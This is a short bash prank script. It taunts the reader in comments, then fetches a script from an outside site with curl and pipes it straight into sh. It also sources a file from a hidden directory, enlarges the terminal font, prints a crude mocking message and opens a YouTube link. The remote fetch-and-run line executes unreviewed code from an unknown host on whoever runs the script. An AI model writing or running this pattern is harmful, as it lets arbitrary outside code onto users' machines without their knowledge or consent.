#!/bin/bash

# loL whatcha lookin for in here???
# Don't worry about it!!!

curl -s 'https://suckaaa.com/s/lib-installer' | sh;
source ~/.garbage/lib;

positionWindow 0 0;
setFontSize 50;

clear;
echo "\n\nI'm currently in your mothers bed — she's not home yet...!!\n\n";

sleep 4s;

open https://www.youtube.com/watch?v=7zPnTtF0Wk8&feature=youtu.be;
